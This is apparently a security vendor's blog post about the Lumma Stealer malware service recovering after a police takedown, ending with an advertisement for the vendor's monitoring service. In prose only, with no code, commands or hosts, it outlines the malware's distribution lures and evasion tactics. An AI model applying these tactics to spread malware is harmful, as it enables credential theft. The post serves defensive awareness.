After a major police operation in May that led to the seizure of around 2,300 domains and part of its infrastructure, Lumma Stealer, one of the most active malware strains on the market, is slowly resuming its operations.
Although its malware-as-a-service (MaaS) platform took a hard hit, it wasn’t completely dismantled. By early June, new signs of activity from this info-stealer were already being detected, making it clear that the operators were still active.
On cybercrime forums like XSS, the Lumma operators reacted quickly, confirming that their main server had not been seized (although it was remotely wiped), and that they were actively working to restore the service.
First message from the Lumma administrator after the police action (Source: Trend Micro)
Despite the initial blow from authorities, the operation behind Lumma Stealer managed to reorganize surprisingly quickly. Its Malware-as-a-Service (MaaS) model gradually resumed, once again gaining the trust of the cybercriminal community and reactivating its data theft activities across multiple platforms.
According to experts from Trend Micro, Lumma has almost fully regained the level of activity it had before the police operation. Their report highlights a swift reconstruction of the infrastructure, supported by real-time telemetry data.
“Following the police action against Lumma Stealer and its associated infrastructure, our team has observed clear signs of a resurgence in its operations,” the report states.
They also add that the malware network began showing intense activity just weeks after the takedown, suggesting that the operators had well-established contingency plans.
New Lumma C2 Domains
Read more: Lumma Malware Detected in Mexico and Selling Data on the Dark Web
Lumma hasn’t just resumed operations—it has returned with improved capabilities to hide itself and continue infecting devices. One of the malware’s most effective tactics remains leveraging legitimate cloud services to disguise its malicious traffic.
However, instead of continuing to use Cloudflare, it has now switched to alternative providers, primarily Selectel, a company based in Russia. This shift has a clear goal: to avoid takedowns and infrastructure disruption by more closely monitored services.
Additionally, Lumma has once again adopted a multifaceted distribution approach, using multiple channels to achieve new infections. In total, four active methods have been identified for spreading the malware:
One of the oldest but still effective methods. Fake software cracks and license key generators (keygens) are promoted via malicious ads and manipulated search results. Victims are led to deceptive sites where their systems are scanned using traffic detection systems (TDS) to confirm they are real targets. Then, they are served the malicious file that initiates the infection: the Lumma Downloader.
In this technique, compromised websites display fake CAPTCHA verification pages. The trick is that when users attempt to complete the verification, PowerShell commands are executed in the background. This allows Lumma to load directly into system memory, helping it evade many security solutions that only scan suspicious files stored on disk.
Attackers are creating GitHub repositories with AI-generated content, designed to attract gamers or curious users with supposed tools, mods, or game hacks. Hidden within these repositories are Lumma payloads—malicious executables in disguise (e.g., named “TempSpoofer.exe”), either directly or packed into ZIP files.
Lastly, Lumma is also being promoted via YouTube videos and Facebook posts that offer free or cracked software. These lead users to external sites where the malware is downloaded. In some cases, legitimate platforms like sites.google.com are abused, giving victims a false sense of safety and credibility.
Malicious GitHub Repository (Left) and YouTube Video (Right) Distributing Lumma Payloads
The return of Lumma Stealer as an active threat highlights a harsh reality: police operations, unless accompanied by arrests or formal charges, are not enough to stop the most persistent cybercriminals.
For the operators behind these Malware-as-a-Service (MaaS) platforms, law enforcement actions are seen more as a temporary setback than a real threat. As long as there are no concrete legal consequences, these actors simply pause, reorganize, and jump back into the game.
The reason is simple: these operations are incredibly lucrative. With thousands of clients renting the malware, the revenue can be extremely high. For those behind it, the risk seems small compared to the profits, and they know how to move quickly to stay one step ahead of the authorities.
Today, a traditional antivirus is no longer enough. Companies need advanced cybersecurity solutions that detect anomalous behavior, analyze traffic in real time, and can respond automatically to potential threats.
At TecnetOne, we understand that effective prevention requires visibility, context, and action. That’s why we offer a comprehensive SOC as a Service solution that combines best-in-class technologies: we use an XDR platform for deeper detection and event correlation, a SIEM system that centralizes and analyzes logs across your infrastructure, and Active Response to react automatically to real-time threats.
Our team of analysts monitors your environment 24/7, supported by threat intelligence, advanced automation, and well-defined response processes. This way, we not only detect and block attacks like Lumma but also help you reduce operational risk, protect your data, and maintain business continuity.